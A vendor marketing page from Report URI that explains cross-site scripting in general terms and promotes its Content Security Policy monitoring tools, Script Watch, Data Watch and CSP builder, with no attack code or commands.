XSS Protection

What is XSS?

Commonly referred to as XSS, but formally known as Cross-Site Scripting, this is a rather dangerous type of security vulnerability for your application to have. It allows an attacker to inject their own JavaScript into your website and at that point, they can do almost anything they like.

Whilst there are several varieties of XSS, like Persistent XSS, Reflected XSS or Self XSS to name some, they can all result in catastrophic consequences but can also all be detected with Report URI.

What can attackers do with XSS?

If an attacker find an XSS vulnerability in your website, the main limits on what they will be able to do will be their own imagination and their ability to write JavaScript.

Some of the most recent examples of XSS attacks are quite notable, including Magecart and CryptoJacking attacks, which you can find examples of in our Case Studies section. These attacks cost companies millions of dollars to recover from and are just the tip of the iceberg when it comes to what's possible.

XSS was the most common vulnerability in 2019, accounting for 18% of discovered vulnerabilities.

- Snyk (State of Open Source Security)

Stopping XSS attacks

When it comes to Application Security, it's really important to understand Defense In Depth and where we, Report URI, fit into your strategy.

Your main protection against XSS should be output encoding and then Content Security Policy, along with reporting through Report URI, which should be your second line of defence. We can alert you immediately to an XSS attack, allowing you to respond quickly, or in most cases, you can neutralise the attack before it even starts.

Average time to identify a data breach in 2022: 207 days

- IBM

How we can help

Having worked with organisations both large and small, we appreciate it can be difficult to create a Content Security Policy, so we've worked hard to reduce that burden with our Tools and Features, some of which are detailed below.

Content Security Policy is a powerful security mechanism and now, you can leverage it with minimal overhead. Sign up for a free trial to get started today and if you need any help, reach out to csp@report-uri.com for support.

Script Watch

Script Watch will monitor all JavaScript dependencies across your entire site and immediately notify you of any changes. A new JavaScript dependency could be the start of a Magecart attack.

Because Script Watch leverages the browser native Content Security Policy, there is no code or agent to deploy and running in the browser means we analyse your site in real-time as your users are browsing. We don't have the same limitations as external scanning services such as authentication or pay walls, geo-sensitive content or an attacker potentially serving safe content to the crawler.

Read More

Data Watch

Data Watch will monitor all of the locations that your webpages are sending data to. If your website starts sending data to a new location, it could be the start of a Magecart attack.

With Script Watch and Data Watch combined, you can monitor for clear indicators that your site has been compromised. Attackers will always want to inject their hostile JavaScript, and they'll always want to exfiltrate their stolen data.

Read More

Content Security Policy

Script Watch and Data Watch will allow you to rapidly detect and respond to a Magecart attack and combined, that capability puts you ahead of the field. If you want to take it a step further, Content Security Policy can mitigate a Magecart attack and stop it from even happening.

Deploying an effective Content Security Policy can be difficult, but our CSP Reporting allows you to gather feedback and safely test a policy before deployment. Once deployed, an effective Content Security Policy will block a Magecart attack and stop the hostile JavaScript from even running.

Read More

Threat Intelligence

We subscribe to various feeds of Threat Intelligence data, along with managing our own internally generated feeds, to keep apprised of the latest threats that exist online.

Using this Threat Intelligence Data, we can better analyse the sources of JavaScript on your website and detect malicious activity sooner.

Read More

The CSP Wizard

We often find that creating a CSP is the first difficult step that organisations face. Having a complete list of all resource dependencies across your entire site like images, scripts or styles, from both 1st-party and 3rd-party locations, is tough to achieve.

The CSP Wizard was created to solve this problem, and in seven days or less, it can you give a complete list of all resources used across your entire site.

With the list of all resources you use on your site, and our easy to use tool, creating a viable Content Security Policy is easier than ever with just a few clicks.

Documentation

The CSP Builder

All Content Security Policies will need to be tweaked at some point. New resources may be added to the site or old resources removed, and the policy needs to be updated to reflect those changes and kept up to date.

You can import your existing policy into the CSP Builder and use our fully featured tool to make any changes that you require right there in the UI. When you're done, hit Generate, and the CSP Builder will provide you with your new, updated policy.

CSP Builder